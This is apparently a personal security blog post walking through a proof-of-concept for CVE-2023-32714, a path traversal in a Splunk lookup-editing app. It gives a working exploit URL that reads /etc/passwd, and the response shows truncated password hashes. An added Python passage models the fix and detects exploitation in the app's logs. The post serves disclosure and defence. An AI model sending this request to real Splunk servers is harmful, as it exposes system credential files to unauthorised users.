CVE-2023-32714 Splunk App for Lookup File Editing, PoC exploit for path traversal

This time I analyzed CVE-2023-32714, a path traversal in the Splunk App for Lookup File Editing.
I checked how a (low-privileged) Splunk user can perform a path traversal if this App is installed.

A diff of App versions 3.6.0 and 4.0.1 shows a new section in __init__.py:

        if version is not None:
            version = os.path.basename(version)

OK, let's dig deeper and open the App at http://splunkserver:8000/en-US/app/lookup_editor/lookup_list

In the Lookup File Editing App you can see many predefined files such as examples.csv, or files that are read-only for a normal user such as registered_users,
or you can create a new entry with the Create a New Lookup button.
If you change the content, a new version of the file is created, and you can go back with the Revert to a previous version button and its drop-down list.

You can guess what comes next.

As long as the lookup_file exists and namespace, lookup_type and owner match, we can ask it to load an "older version" of the file ;-)

    lookup_contents?
        lookup_file=examples.csv        (the parameter is lookup_file, not 'lookup')
        &namespace=splunk-dashboard-studio
        &lookup_type=csv
        &version=../../../../../../../../etc/passwd
        &owner=nobody

Triggering the path traversal:

http://vmu2004:8000/en-US/splunkd/__raw/services/data/lookup_edit/lookup_contents?lookup_file=examples.csv&namespace=splunk-dashboard-studio&lookup_type=csv&version=../../../../../../../../etc/passwd&owner=nobody

Response:

[[":admin:$6$xFG4uO8RpRr......::Administrator:admin::::19467"], [":user:$6$ZbdM6GA7kO........:::user::::19527"]]

The App's REST handler log (less /opt/splunk/var/log/splunk/lookup_editor_rest_handler.log) shows the resolved path:

06/19/2023 10:38:16 PM +0200 CEST INFO Resolved lookup file, path=/opt/splunk-9.0.3/etc/passwd
06/19/2023 10:38:16 PM +0200 CEST INFO Size of lookup file determined, file_size=293, path=/opt/splunk-9.0.3/etc/passwd
06/19/2023 10:38:16 PM +0200 CEST INFO Loading lookup file from path=/opt/splunk-9.0.3/etc/passwd
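As an added example (not the App's code and not the author's PoC), a small Python model of the pre- and post-fix behaviour of the 4.0.1 diff above, plus a check over log lines like the ones just shown that flags any resolved lookup path outside the lookups directory. The lookups directory and the second log line are constructed; only the basename() fix line comes from the diff.

```python
import os
import re

# Constructed sample, modelled on the lookup_editor_rest_handler.log lines in
# the post (the second line is invented to show a benign request).
SAMPLE_LOG = """\
06/19/2023 10:38:16 PM +0200 CEST INFO Resolved lookup file, path=/opt/splunk-9.0.3/etc/passwd
06/19/2023 10:35:02 PM +0200 CEST INFO Resolved lookup file, path=/opt/splunk-9.0.3/etc/apps/splunk-dashboard-studio/lookups/examples.csv
"""

def resolve_version_path(lookups_dir, version, sanitize):
    """Hypothetical model of the handler: join the user-supplied `version`
    under the app's lookups directory. With sanitize=True the value is first
    reduced to its basename, which is what the 4.0.1 diff adds."""
    if sanitize and version is not None:
        version = os.path.basename(version)   # "../../etc/passwd" -> "passwd"
    return os.path.normpath(os.path.join(lookups_dir, version))

def escapes(lookups_dir, resolved):
    """True if `resolved` lies outside `lookups_dir` after normalisation."""
    base = os.path.normpath(lookups_dir)
    return os.path.commonpath([base, os.path.normpath(resolved)]) != base

def suspicious_log_paths(log_text, allowed_roots):
    """Detection: return every path the REST handler logged as resolved that
    falls outside all allowed lookups roots. Alert on a non-empty result."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r"Resolved lookup file, path=(\S+)", line)
        if m and all(escapes(root, m.group(1)) for root in allowed_roots):
            hits.append(m.group(1))
    return hits

if __name__ == "__main__":
    lookups = "/opt/splunk-9.0.3/etc/apps/splunk-dashboard-studio/lookups"
    bad = "../../../../../../../../etc/passwd"
    for sanitize in (False, True):
        p = resolve_version_path(lookups, bad, sanitize)
        print(f"sanitize={sanitize}: {p} escapes={escapes(lookups, p)}")
    print(suspicious_log_paths(SAMPLE_LOG, ["/opt/splunk-9.0.3/etc/apps"]))
```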

Internally at my company I started the game “security incident threat handling & response”. I like such “simple” things because we need more eye-openers for security awareness in terms of faster installation of updates.
Splunk was already updated to 9.0.5, but the App was forgotten :-/
Reported to my IT at 22:00, updated the next day at 11:00. I was happy to lose the “game” because I thought it would last much longer.

Thank you for reading. The CVE credit is not mine, but the work on the PoC exploit is powered by psytester; this post was only for my private fun. ;-)

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2023 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

Written on June 8, 2023 | Last modified on June 19, 2023